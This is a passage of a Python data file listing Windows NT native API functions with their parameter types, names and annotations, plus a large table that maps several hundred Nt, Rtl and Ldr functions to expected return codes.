'SIZE_T', 'PSIZE_T'], ['ProcessHandle', 'BaseAddress', 'MemoryInformationClass', 'MemoryInformation', 'MemoryInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtQueryVolumeInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FS_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FsInformation', 'Length', 'FsInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtReadFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN_opt', '__IN_opt']), 'NtSetInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtSetInformationThread': (4, ['HANDLE', 'THREADINFOCLASS', 'PVOID', 'ULONG'], ['ThreadHandle', 'ThreadInformationClass', 'ThreadInformation', 'ThreadInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetInformationToken': (4, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetQuotaInformationFile': (4, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG'], ['FileHandle', 'IoStatusBlock', 'Buffer', 'Length'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN']), 'NtSetSecurityObject': (3, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR'], ['Handle', 'SecurityInformation', 'SecurityDescriptor'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtUnlockFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'ULONG'], ['FileHandle', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtWriteFile': (9, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'PLARGE_INTEGER', 'PULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'ByteOffset', 'Key'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt'])} syscallRS = {'NtWorkerFactoryWorkerReady': 'STATUS_SUCCESS', 'NtMapUserPhysicalPagesScatter': 'STATUS_SUCCESS', 'NtWaitForMultipleObjects32': 'S_OK', 'NtReplyWaitReceivePortEx': 'STATUS_SUCCESS', 'NtQueryDefaultUILanguage': 'STATUS_SUCCESS', 'NtApphelpCacheControl': 'STATUS_SUCCESS', 'NtCreateProcessEx': 'STATUS_SUCCESS', 'NtIsProcessInJob': 'STATUS_SUCCESS', 'NtAccessCheckByTypeAndAuditAlarm': 'STATUS_SUCCESS', 'NtTraceEvent': 'STATUS_SUCCESS', 'NtPowerInformation': 'STATUS_SUCCESS', 'NtAccessCheckByType': 'STATUS_SUCCESS', 'NtAccessCheckByTypeResultList': 'STATUS_SUCCESS', 'NtAccessCheckByTypeResultListAndAuditAlarm': 'STATUS_SUCCESS', 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle': 'STATUS_SUCCESS', 'NtAddAtomEx': 'STATUS_SUCCESS', 'NtAddBootEntry': 'STATUS_SUCCESS', 'NtAddDriverEntry': 'STATUS_SUCCESS', 'NtAdjustTokenClaimsAndDeviceGroups': 'STATUS_SUCCESS', 'NtAlertThreadByThreadId': 'STATUS_SUCCESS', 'NtAllocateReserveObject': 'STATUS_SUCCESS', 'NtGetNextProcess': 'STATUS_SUCCESS', 'NtGetNextThread': 'STATUS_SUCCESS', 'NtQueueApcThreadEx': 'STATUS_SUCCESS', 'NtUmsThreadYield': 'STATUS_SUCCESS', 'NtAllocateUserPhysicalPages': 'STATUS_SUCCESS', 'NtAllocateVirtualMemoryEx': 'STATUS_SUCCESS', 'NtAlpcAcceptConnectPort': 'STATUS_SUCCESS', 'NtAlpcCancelMessage': 'STATUS_SUCCESS', 'NtAlpcCreatePort': 'STATUS_SUCCESS', 'NtAlpcCreatePortSection': 'STATUS_SUCCESS', 'NtAlpcCreateResourceReserve': 'STATUS_SUCCESS', 'NtAlpcCreateSectionView': 'STATUS_SUCCESS', 'NtAlpcCreateSecurityContext': 'STATUS_SUCCESS', 'NtAlpcDeletePortSection': 'STATUS_SUCCESS', 'NtAlpcDeleteResourceReserve': 'STATUS_SUCCESS', 'NtAlpcDeleteSectionView': 'STATUS_SUCCESS', 'NtAlpcDeleteSecurityContext': 'STATUS_SUCCESS', 'NtAlpcDisconnectPort': 'STATUS_SUCCESS', 'NtAlpcImpersonateClientOfPort': 'STATUS_SUCCESS', 'NtAlpcOpenSenderProcess': 'STATUS_SUCCESS', 'NtAlpcOpenSenderThread': 'STATUS_SUCCESS', 'NtAlpcQueryInformation': 'STATUS_SUCCESS', 'NtAlpcQueryInformationMessage': 'STATUS_SUCCESS', 'NtAlpcRevokeSecurityContext': 'STATUS_SUCCESS', 'NtAlpcSendWaitReceivePort': 'STATUS_SUCCESS', 'NtAlpcSetInformation': 'STATUS_SUCCESS', 'NtEnumerateBootEntries': 'STATUS_SUCCESS', 'NtEnumerateDriverEntries': 'STATUS_SUCCESS', 'NtEnumerateSystemEnvironmentValuesEx': 'STATUS_SUCCESS', 'NtQueryBootEntryOrder': 'STATUS_SUCCESS', 'NtQueryBootOptions': 'STATUS_SUCCESS', 'NtQueryDriverEntryOrder': 'STATUS_SUCCESS', 'NtQuerySystemEnvironmentValueEx': 'STATUS_SUCCESS', 'NtSetBootEntryOrder': 'STATUS_SUCCESS', 'NtSetDriverEntryOrder': 'STATUS_SUCCESS', 'NtQuerySystemInformationEx': 'STATUS_SUCCESS', 'NtInitializeNlsFiles': 'STATUS_SUCCESS', 'NtAcquireCMFViewOwnership': 'STATUS_SUCCESS', 'NtCreateProfileEx': 'STATUS_SUCCESS', 'NtCreateWorkerFactory': 'STATUS_SUCCESS', 'NtFlushInstallUILanguage': 'STATUS_SUCCESS', 'NtGetMUIRegistryInfo': 'STATUS_SUCCESS', 'NtGetNlsSectionPtr': 'STATUS_SUCCESS', 'NtIsUILanguageComitted': 'STATUS_SUCCESS', 'NtReleaseCMFViewOwnership': 'STATUS_SUCCESS', 'NtReleaseWorkerFactoryWorker': 'STATUS_SUCCESS', 'NtQueryInformationWorkerFactory': 'STATUS_SUCCESS', 'NtSetInformationWorkerFactory': 'STATUS_SUCCESS', 'NtWaitForWorkViaWorkerFactory': 'STATUS_SUCCESS', 'NtShutdownWorkerFactory': 'STATUS_SUCCESS', 'NtSetTimerEx': 'STATUS_SUCCESS', 'NtCancelTimer2': 'STATUS_SUCCESS', 'NtSetTimer2': 'STATUS_SUCCESS', 'NtQueryWnfStateData': 'STATUS_SUCCESS', 'NtUpdateWnfStateData': 'STATUS_SUCCESS', 'NtDisableLastKnownGood': 'STATUS_SUCCESS', 'NtEnableLastKnownGood': 'STATUS_SUCCESS', 'NtCancelSynchronousIoFile': 'STATUS_SUCCESS', 'NtSetIoCompletion': 'STATUS_SUCCESS', 'NtSetIoCompletionEx': 'STATUS_SUCCESS', 'NtRemoveIoCompletionEx': 'STATUS_SUCCESS', 'NtNotifyChangeSession': 'STATUS_SUCCESS', 'NtAssociateWaitCompletionPacket': 'STATUS_SUCCESS', 'NtFlushProcessWriteBuffers': 'STATUS_SUCCESS', 'NtCommitComplete': 'STATUS_SUCCESS', 'NtCommitEnlistment': 'STATUS_SUCCESS', 'NtCommitTransaction': 'STATUS_SUCCESS', 'NtCreateEnlistment': 'STATUS_SUCCESS', 'NtCreateResourceManager': 'STATUS_SUCCESS', 'NtCreateTransaction': 'STATUS_SUCCESS', 'NtCreateTransactionManager': 'STATUS_SUCCESS', 'NtEnumerateTransactionObject': 'STATUS_SUCCESS', 'NtFreezeTransactions': 'STATUS_SUCCESS', 'NtGetNotificationResourceManager': 'STATUS_SUCCESS', 'NtOpenEnlistment': 'STATUS_SUCCESS', 'NtOpenResourceManager': 'STATUS_SUCCESS', 'NtOpenTransaction': 'STATUS_SUCCESS', 'NtOpenTransactionManager': 'STATUS_SUCCESS', 'NtPrepareComplete': 'STATUS_SUCCESS', 'NtPrepareEnlistment': 'STATUS_SUCCESS', 'NtPrePrepareComplete': 'STATUS_SUCCESS', 'NtPrePrepareEnlistment': 'STATUS_SUCCESS', 'NtPropagationComplete': 'STATUS_SUCCESS', 'NtPropagationFailed': 'STATUS_SUCCESS', 'NtQueryInformationEnlistment': 'STATUS_SUCCESS', 'NtQueryInformationResourceManager': 'STATUS_SUCCESS', 'NtQueryInformationTransaction': 'STATUS_SUCCESS', 'NtQueryInformationTransactionManager': 'STATUS_SUCCESS', 'NtReadOnlyEnlistment': 'STATUS_SUCCESS', 'NtRecoverEnlistment': 'STATUS_SUCCESS', 'NtRecoverResourceManager': 'STATUS_SUCCESS', 'NtRecoverTransactionManager': 'STATUS_SUCCESS', 'NtRegisterProtocolAddressInformation': 'STATUS_SUCCESS', 'NtRenameTransactionManager': 'STATUS_SUCCESS', 'NtRollBackComplete': 'STATUS_SUCCESS', 'NtRollBackEnlistment': 'STATUS_SUCCESS', 'NtRollBackTransaction': 'STATUS_SUCCESS', 'NtRollforwardTransactionManager': 'STATUS_SUCCESS', 'NtSetInformationEnlistment': 'STATUS_SUCCESS', 'NtSetInformationResourceManager': 'STATUS_SUCCESS', 'NtSetInformationTransaction': 'STATUS_SUCCESS', 'NtSetInformationTransactionManager': 'STATUS_SUCCESS', 'NtSinglePhaseReject': 'STATUS_SUCCESS', 'NtStartTm': 'STATUS_SUCCESS', 'NtThawRegistry': 'STATUS_SUCCESS', 'NtThawTransactions': 'STATUS_SUCCESS', 'NtDrawText': 'STATUS_SUCCESS', 'NtTraceControl': 'STATUS_SUCCESS', 'NtSetWnfProcessNotificationEvent': 'STATUS_SUCCESS', 'NtSetInformationVirtualMemory': 'STATUS_SUCCESS', 'NtOpenPrivateNamespace': 'STATUS_SUCCESS', 'NtCreatePrivateNamespace': 'STATUS_SUCCESS', 'NtDeletePrivateNamespace': 'STATUS_SUCCESS', 'NtReplacePartitionUnit': 'STATUS_SUCCESS', 'NtSerializeBoot': 'STATUS_SUCCESS', 'NtOpenKeyTransacted': 'STATUS_SUCCESS', 'NtOpenKeyTransactedEx': 'STATUS_SUCCESS', 'NtFreezeRegistry': 'STATUS_SUCCESS', 'NtCreateKeyTransacted': 'STATUS_SUCCESS', 'NtQuerySecurityAttributesToken': 'STATUS_SUCCESS', 'NtWow64CallFunction64': 'STATUS_SUCCESS', 'NtWow64WriteVirtualMemory64': 'STATUS_SUCCESS', 'NtAlpcConnectPortEx': 'STATUS_SUCCESS', 'NtAlpcImpersonateClientContainerOfPort': 'STATUS_SUCCESS', 'NtAreMappedFilesTheSame': 'STATUS_SUCCESS', 'NtAssignProcessToJobObject': 'STATUS_SUCCESS', 'NtCreateJobSet': 'STATUS_SUCCESS', 'NtCreateJobObject': 'STATUS_SUCCESS', 'NtOpenJobObject': 'STATUS_SUCCESS', 'NtQueryInformationJobObject': 'STATUS_SUCCESS', 'NtSetInformationJobObject': 'STATUS_SUCCESS', 'NtTerminateJobObject': 'STATUS_SUCCESS', 'NtCallEnclave': 'STATUS_SUCCESS', 'NtTerminateEnclave': 'STATUS_SUCCESS', 'NtInitializeEnclave': 'STATUS_SUCCESS', 'NtCreateEnclave': 'STATUS_SUCCESS', 'NtLoadEnclaveData': 'STATUS_SUCCESS', 'NtCreateSectionEx': 'STATUS_SUCCESS', 'NtMapViewOfSectionEx': 'STATUS_SUCCESS', 'NtUnmapViewOfSectionEx': 'STATUS_SUCCESS', 'NtCreatePartition': 'STATUS_SUCCESS', 'NtOpenPartition': 'STATUS_SUCCESS', 'NtManagePartition': 'STATUS_SUCCESS', 'NtMapUserPhysicalPages': 'STATUS_SUCCESS', 'NtAllocateUserPhysicalPagesEx': 'STATUS_SUCCESS', 'NtGetWriteWatch': 'STATUS_SUCCESS', 'NtResetWriteWatch': 'STATUS_SUCCESS', 'NtCreatePagingFile': 'STATUS_SUCCESS', 'NtCancelIoFileEx': 'STATUS_SUCCESS', 'NtCancelWaitCompletionPacket': 'STATUS_SUCCESS', 'NtCreateWaitCompletionPacket': 'STATUS_SUCCESS', 'NtCompareObjects': 'STATUS_SUCCESS', 'NtCompareTokens': 'STATUS_SUCCESS', 'NtContinueEx': 'STATUS_SUCCESS', 'NtCreateCrossVmEvent': 'STATUS_SUCCESS', 'NtCreateCrossVmMutant': 'STATUS_SUCCESS', 'NtCreateDirectoryObjectEx': 'STATUS_SUCCESS', 'NtCreateIRTimer': 'STATUS_SUCCESS', 'NtCreateLowBoxToken': 'STATUS_SUCCESS', 'NtCreateRegistryTransaction': 'STATUS_SUCCESS', 'NtCreateThreadEx': 'STATUS_SUCCESS', 'NtCreateTimer2': 'STATUS_SUCCESS', 'NtCreateTokenEx': 'STATUS_SUCCESS', 'NtCreateUserProcess': 'STATUS_SUCCESS', 'NtCreateWaitablePort': 'STATUS_SUCCESS', 'NtCreateWnfStateName': 'STATUS_SUCCESS', 'NtDebugContinue': 'STATUS_SUCCESS', 'NtDeleteBootEntry': 'STATUS_SUCCESS', 'NtDeleteDriverEntry': 'STATUS_SUCCESS', 'NtDeleteWnfStateData': 'STATUS_SUCCESS', 'NtDeleteWnfStateName': 'STATUS_SUCCESS', 'NtDirectGraphicsCall': 'STATUS_SUCCESS', 'NtFilterBootOption': 'STATUS_SUCCESS', 'NtFilterToken': 'STATUS_SUCCESS', 'NtFilterTokenEx': 'STATUS_SUCCESS', 'NtGetCachedSigningLevel': 'STATUS_SUCCESS', 'NtGetCompleteWnfStateSubscription': 'STATUS_SUCCESS', 'NtGetContextThread': 'STATUS_SUCCESS', 'NtGetCurrentProcessorNumber': 'S_OK', 'NtGetCurrentProcessorNumberEx': 'STATUS_SUCCESS', 'NtGetDevicePowerState': 'STATUS_SUCCESS', 'NtImpersonateAnonymousToken': 'STATUS_SUCCESS', 'NtInitializeRegistry': 'STATUS_SUCCESS', 'NtInitiatePowerAction': 'STATUS_SUCCESS', 'NtIsSystemResumeAutomatic': 'STATUS_SUCCESS', 'NtLoadKeyEx': 'STATUS_SUCCESS', 'NtLockProductActivationKeys': 'STATUS_SUCCESS', 'NtLockRegistryKey': 'STATUS_SUCCESS', 'NtMakePermanentObject': 'STATUS_SUCCESS', 'NtManageHotPatch': 'STATUS_SUCCESS', 'NtMapCMFModule': 'STATUS_SUCCESS', 'NtModifyBootEntry': 'STATUS_SUCCESS', 'NtModifyDriverEntry': 'STATUS_SUCCESS', 'NtNotifyChangeDirectoryFileEx': 'STATUS_SUCCESS', 'NtNotifyChangeMultipleKeys': 'STATUS_SUCCESS', 'NtOpenKeyEx': 'STATUS_SUCCESS', 'NtOpenKeyedEvent': 'STATUS_SUCCESS', 'NtOpenRegistryTransaction': 'STATUS_SUCCESS', 'NtPlugPlayControl': 'STATUS_SUCCESS', 'NtPssCaptureVaSpaceBulk': 'STATUS_SUCCESS', 'NtQueryAuxiliaryCounterFrequency': 'STATUS_SUCCESS', 'NtQueryDebugFilterState': 'STATUS_SUCCESS', 'NtQueryInformationByName': 'STATUS_SUCCESS', 'NtQueryInstallUILanguage': 'STATUS_SUCCESS', 'NtQueryLicenseValue': 'STATUS_SUCCESS', 'NtQueryOpenSubKeys': 'STATUS_SUCCESS', 'NtQueryOpenSubKeysEx': 'STATUS_SUCCESS', 'NtQueryPortInformationProcess': 'STATUS_SUCCESS', 'NtQuerySecurityPolicy': 'STATUS_SUCCESS', 'NtQueryWnfStateNameInformation': 'STATUS_SUCCESS', 'NtRenameKey': 'STATUS_SUCCESS', 'NtResumeProcess': 'STATUS_SUCCESS', 'NtRevertContainerImpersonation': 'STATUS_SUCCESS', 'NtRollbackRegistryTransaction': 'STATUS_SUCCESS', 'NtSaveKeyEx': 'STATUS_SUCCESS', 'NtSaveMergedKeys': 'STATUS_SUCCESS', 'NtSecureConnectPort': 'STATUS_SUCCESS', 'NtSetBootOptions': 'STATUS_SUCCESS', 'NtSetCachedSigningLevel': 'STATUS_SUCCESS', 'NtSetCachedSigningLevel2': 'STATUS_SUCCESS', 'NtSetContextThread': 'STATUS_SUCCESS', 'NtSetDebugFilterState': 'STATUS_SUCCESS', 'NtSetDefaultUILanguage': 'STATUS_SUCCESS', 'NtSetIRTimer': 'STATUS_SUCCESS', 'NtSetInformationDebugObject': 'STATUS_SUCCESS', 'NtSetInformationSymbolicLink': 'STATUS_SUCCESS', 'NtSetLdtEntries': 'STATUS_SUCCESS', 'NtSetSystemEnvironmentValueEx': 'STATUS_SUCCESS', 'NtSetSystemPowerState': 'STATUS_SUCCESS', 'NtSetThreadExecutionState': 'STATUS_SUCCESS', 'NtSetUuidSeed': 'STATUS_SUCCESS', 'NtSubscribeWnfStateChange': 'STATUS_SUCCESS', 'NtSuspendProcess': 'STATUS_SUCCESS', 'NtTranslateFilePath': 'STATUS_SUCCESS', 'NtUnloadKey2': 'STATUS_SUCCESS', 'NtUnloadKeyEx': 'STATUS_SUCCESS', 'NtUnsubscribeWnfStateChange': 'STATUS_SUCCESS', 'NtVdmControl': 'STATUS_SUCCESS', 'NtWaitForAlertByThreadId': 'STATUS_SUCCESS', 'NtWaitForDebugEvent': 'STATUS_SUCCESS', 'NtLoadKey3': 'STATUS_SUCCESS', 'NtAlpcConnectPort': 'STATUS_SUCCESS', 'NtCancelDeviceWakeupRequest': 'STATUS_SUCCESS', 'NtCreateChannel': 'STATUS_SUCCESS', 'NtFreeUserPhysicalPages': 'STATUS_SUCCESS', 'NtGetPlugPlayEvent': 'STATUS_SUCCESS', 'NtOpenChannel': 'STATUS_SUCCESS', 'NtReplyWaitSendChannel': 'STATUS_SUCCESS', 'NtSendWaitReplyChannel': 'STATUS_SUCCESS', 'NtSetContextChannel': 'STATUS_SUCCESS', 'NtRequestDeviceWakeup': 'STATUS_SUCCESS', 'NtRequestWakeupLatency': 'STATUS_SUCCESS', 'NtW32Call': 'STATUS_SUCCESS', 'KiUserApcDispatcher': 'S_OK', 'NtAlertThread': 'STATUS_SUCCESS', 'NtCallbackReturn': 'STATUS_SUCCESS', 'NtQueueApcThread': 'STATUS_SUCCESS', 'NtTestAlert': 'STATUS_SUCCESS', 'NtAddAtom': 'STATUS_SUCCESS', 'NtDeleteAtom': 'STATUS_SUCCESS', 'NtFindAtom': 'STATUS_SUCCESS', 'NtQueryInformationAtom': 'STATUS_SUCCESS', 'RtlCompressBuffer': 'STATUS_SUCCESS', 'RtlDecompressBuffer': 'STATUS_SUCCESS', 'RtlGetCompressionWorkSpaceSize': 'STATUS_SUCCESS', 'DbgPrint': 'STATUS_SUCCESS', 'NtSystemDebugControl': 'STATUS_SUCCESS', 'RtlCaptureStackBackTrace': 'S_OK', 'RtlGetCallersAddress': 'S_OK', 'NtDisplayString': 'STATUS_SUCCESS', 'NtRaiseException': 'STATUS_SUCCESS', 'NtRaiseHardError': 'STATUS_SUCCESS', 'NtSetDefaultHardErrorPort': 'STATUS_SUCCESS', 'NtQuerySystemEnvironmentValue': 'STATUS_SUCCESS', 'NtSetSystemEnvironmentValue': 'STATUS_SUCCESS', 'RtlCreateEnvironment': 'STATUS_SUCCESS', 'RtlDestroyEnvironment': 'S_OK', 'RtlExpandEnvironmentStrings_U': 'STATUS_SUCCESS', 'RtlQueryEnvironmentVariable_U': 'STATUS_SUCCESS', 'RtlSetCurrentEnvironment': 'S_OK', 'RtlSetEnvironmentVariable': 'STATUS_SUCCESS', 'LdrGetDllHandle': 'STATUS_SUCCESS', 'LdrGetProcedureAddress': 'STATUS_SUCCESS', 'LdrLoadDll': 'STATUS_SUCCESS', 'LdrQueryProcessModuleInformation': 'STATUS_SUCCESS', 'LdrShutdownProcess': 'S_OK', 'LdrShutdownThread': 'S_OK', 'LdrUnloadDll': 'STATUS_SUCCESS', 'NtLoadDriver': 'STATUS_SUCCESS', 'NtUnloadDriver': 'STATUS_SUCCESS', 'RtlImageNtHeader': 'S_OK', 'RtlImageRvaToVa': 'S_OK', 'NtFlushWriteBuffer': 'STATUS_SUCCESS', 'NtShutdownSystem': 'STATUS_SUCCESS', 'NtQueryDefaultLocale': 'STATUS_SUCCESS', 'NtSetDefaultLocale': 'STATUS_SUCCESS', 'RtlAllocateHeap': 'S_OK', 'RtlCompactHeap': 'S_OK', 'RtlCreateHeap': 'S_OK', 'RtlDestroyHeap': 'STATUS_SUCCESS', 'RtlEnumProcessHeaps': 'STATUS_SUCCESS', 'RtlFreeHeap': 'S_OK', 'RtlGetProcessHeaps': 'S_OK', 'RtlLockHeap': 'S_OK', 'RtlProtectHeap': 'S_OK', 'RtlReAllocateHeap': 'S_OK', 'RtlSizeHeap': 'S_OK', 'RtlUnlockHeap': 'S_OK', 'RtlValidateHeap': 'S_OK', 'RtlValidateProcessHeaps': 'S_OK', 'RtlWalkHeap': 'STATUS_SUCCESS', 'NtAllocateVirtualMemory': 'STATUS_SUCCESS', 'NtFlushVirtualMemory': 'STATUS_SUCCESS', 'NtFreeVirtualMemory': 'STATUS_SUCCESS', 'NtLockVirtualMemory': 'STATUS_SUCCESS', 'NtProtectVirtualMemory': 'STATUS_SUCCESS', 'NtQueryVirtualMemory': 'STATUS_SUCCESS', 'NtReadVirtualMemory': 'STATUS_SUCCESS', 'NtUnlockVirtualMemory': 'STATUS_SUCCESS', 'NtWriteVirtualMemory': 'STATUS_SUCCESS', 'NtQuerySecurityObject': 'STATUS_SUCCESS', 'NtSetSecurityObject': 'STATUS_SUCCESS', 'NtDuplicateObject': 'STATUS_SUCCESS', 'NtMakeTemporaryObject': 'STATUS_SUCCESS', 'NtQueryObject': 'STATUS_SUCCESS', 'NtSetInformationObject': 'STATUS_SUCCESS', 'NtSignalAndWaitForSingleObject': 'STATUS_SUCCESS', 'NtWaitForMultipleObjects': 'STATUS_SUCCESS', 'NtWaitForSingleObject': 'STATUS_SUCCESS', 'NtCreateDebugObject': 'STATUS_SUCCESS', 'NtDebugActiveProcess': 'STATUS_SUCCESS', 'NtRemoveProcessDebug': 'STATUS_SUCCESS', 'NtCreateDirectoryObject': 'STATUS_SUCCESS', 'NtOpenDirectoryObject': 'STATUS_SUCCESS', 'NtQueryDirectoryObject': 'STATUS_SUCCESS', 'NtClearEvent': 'STATUS_SUCCESS', 'NtCreateEvent': 'STATUS_SUCCESS', 'NtOpenEvent': 'STATUS_SUCCESS', 'NtPulseEvent': 'STATUS_SUCCESS', 'NtQueryEvent': 'STATUS_SUCCESS', 'NtResetEvent': 'STATUS_SUCCESS', 'NtSetEvent': 'STATUS_SUCCESS', 'NtSetEventBoostPriority': 'STATUS_SUCCESS', 'NtCreateEventPair': 'STATUS_SUCCESS', 'NtOpenEventPair': 'STATUS_SUCCESS', 'NtSetHighEventPair': 'STATUS_SUCCESS', 'NtSetHighWaitLowEventPair': 'STATUS_SUCCESS', 'NtSetHighWaitLowThread': 'STATUS_SUCCESS', 'NtSetLowEventPair': 'STATUS_SUCCESS', 'NtSetLowWaitHighEventPair': 'STATUS_SUCCESS', 'NtSetLowWaitHighThread': 'STATUS_SUCCESS', 'NtWaitHighEventPair': 'STATUS_SUCCESS', 'NtWaitLowEventPair': 'STATUS_SUCCESS', 'NtCancelIoFile': 'STATUS_SUCCESS', 'NtCreateFile': 'STATUS_SUCCESS', 'NtCreateMailslotFile': 'STATUS_SUCCESS', 'NtCreateNamedPipeFile': 'STATUS_SUCCESS', 'NtCreatePagingFile': 'STATUS_SUCCESS', 'NtDeleteFile': 'STATUS_SUCCESS', 'NtDeviceIoControlFile': 'STATUS_SUCCESS', 'NtFlushBuffersFile': 'STATUS_SUCCESS', 'NtFsControlFile': 'STATUS_SUCCESS', 'NtLockFile': 'STATUS_SUCCESS', 'NtNotifyChangeDirectoryFile': 'STATUS_SUCCESS', 'NtOpenFile': 'STATUS_SUCCESS', 'NtQueryAttributesFile': 'STATUS_SUCCESS', 'NtQueryDirectoryFile': 'STATUS_SUCCESS', 'NtQueryEaFile': 'STATUS_SUCCESS', 'NtQueryFullAttributesFile': 'STATUS_SUCCESS', 'NtQueryInformationFile': 'STATUS_SUCCESS', 'NtQueryOleDirectoryFile': 'STATUS_SUCCESS', 'NtQueryVolumeInformationFile': 'STATUS_SUCCESS', 'NtReadFile': 'STATUS_SUCCESS', 'NtReadFileScatter': 'STATUS_SUCCESS', 'NtSetEaFile': 'STATUS_SUCCESS', 'NtSetInformationFile': 'STATUS_SUCCESS', 'NtSetVolumeInformationFile': 'STATUS_SUCCESS', 'NtUnlockFile': 'STATUS_SUCCESS', 'NtWriteFile': 'STATUS_SUCCESS', 'NtWriteFileGather': 'STATUS_SUCCESS', 'NtCreateIoCompletion': 'STATUS_SUCCESS', 'NtOpenIoCompletion': 'STATUS_SUCCESS', 'NtQueryIoCompletion': 'STATUS_SUCCESS', 'NtRemoveIoCompletion': 'STATUS_SUCCESS', 'NtSetIoCompletion': 'STATUS_SUCCESS', 'NtCompactKeys': 'STATUS_SUCCESS', 'NtCompressKey': 'STATUS_SUCCESS', 'NtCreateKey': 'STATUS_SUCCESS', 'NtDeleteKey': 'STATUS_SUCCESS', 'NtDeleteValueKey': 'STATUS_SUCCESS', 'NtEnumerateKey': 'STATUS_SUCCESS', 'NtEnumerateValueKey': 'STATUS_SUCCESS', 'NtFlushKey': 'STATUS_SUCCESS', 'NtLoadKey': 'STATUS_SUCCESS', 'NtLoadKey2': 'STATUS_SUCCESS', 'NtNotifyChangeKey': 'STATUS_SUCCESS', 'NtOpenKey': 'STATUS_SUCCESS', 'NtQueryKey': 'STATUS_SUCCESS', 'NtQueryMultipleValueKey': 'STATUS_SUCCESS', 'NtQueryValueKey': 'STATUS_SUCCESS', 'NtReplaceKey': 'STATUS_SUCCESS', 'NtRestoreKey': 'STATUS_SUCCESS', 'NtSaveKey': 'STATUS_SUCCESS', 'NtSetInformationKey': 'STATUS_SUCCESS', 'NtSetValueKey': 'STATUS_SUCCESS', 'NtUnloadKey': 'STATUS_SUCCESS', 'RtlFormatCurrentUserKeyPath': 'STATUS_SUCCESS', 'NtCreateKeyedEvent': 'STATUS_SUCCESS', 'NtReleaseKeyedEvent': 'STATUS_SUCCESS', 'NtWaitForKeyedEvent': 'STATUS_SUCCESS', 'NtCreateMutant': 'STATUS_SUCCESS', 'NtOpenMutant': 'STATUS_SUCCESS', 'NtQueryMutant': 'STATUS_SUCCESS', 'NtReleaseMutant': 'STATUS_SUCCESS', 'NtAcceptConnectPort': 'STATUS_SUCCESS', 'NtCompleteConnectPort': 'STATUS_SUCCESS', 'NtConnectPort': 'STATUS_SUCCESS', 'NtCreatePort': 'STATUS_SUCCESS', 'NtImpersonateClientOfPort': 'STATUS_SUCCESS', 'NtListenPort': 'STATUS_SUCCESS', 'NtQueryInformationPort': 'STATUS_SUCCESS', 'NtReadRequestData': 'STATUS_SUCCESS', 'NtReplyPort': 'STATUS_SUCCESS', 'NtReplyWaitReceivePort': 'STATUS_SUCCESS', 'NtReplyWaitReplyPort': 'STATUS_SUCCESS', 'NtRequestPort': 'STATUS_SUCCESS', 'NtRequestWaitReplyPort': 'STATUS_SUCCESS', 'NtWriteRequestData': 'STATUS_SUCCESS', 'NtCreateProcess': 'STATUS_SUCCESS', 'NtFlushInstructionCache': 'STATUS_SUCCESS', 'NtOpenProcess': 'STATUS_SUCCESS', 'NtQueryInformationProcess': 'STATUS_SUCCESS', 'NtSetInformationProcess': 'STATUS_SUCCESS', 'NtTerminateProcess': 'STATUS_SUCCESS', 'RtlCreateUserProcess': 'STATUS_SUCCESS', 'NtCreateProfile': 'STATUS_SUCCESS', 'NtQueryIntervalProfile': 'STATUS_SUCCESS', 'NtSetIntervalProfile': 'STATUS_SUCCESS', 'NtStartProfile': 'STATUS_SUCCESS', 'NtStopProfile': 'STATUS_SUCCESS', 'NtCreateSection': 'STATUS_SUCCESS', 'NtExtendSection': 'STATUS_SUCCESS', 'NtMapViewOfSection': 'STATUS_SUCCESS', 'NtOpenSection': 'STATUS_SUCCESS', 'NtQuerySection': 'STATUS_SUCCESS', 'NtUnmapViewOfSection': 'STATUS_SUCCESS', 'NtCreateSemaphore': 'STATUS_SUCCESS', 'NtOpenSemaphore': 'STATUS_SUCCESS', 'NtQuerySemaphore': 'STATUS_SUCCESS', 'NtReleaseSemaphore': 'STATUS_SUCCESS', 'NtCreateSymbolicLinkObject': 'STATUS_SUCCESS', 'NtOpenSymbolicLinkObject': 'STATUS_SUCCESS', 'NtQuerySymbolicLinkObject': 'STATUS_SUCCESS', 'NtAlertResumeThread': 'STATUS_SUCCESS', 'NtContinue': 'STATUS_SUCCESS', 'NtCreateThread': 'STATUS_SUCCESS', 'NtCurrentTeb': 'S_OK', 'NtDelayExecution': 'STATUS_SUCCESS', 'NtImpersonateThread': 'STATUS_SUCCESS', 'NtOpenThread': 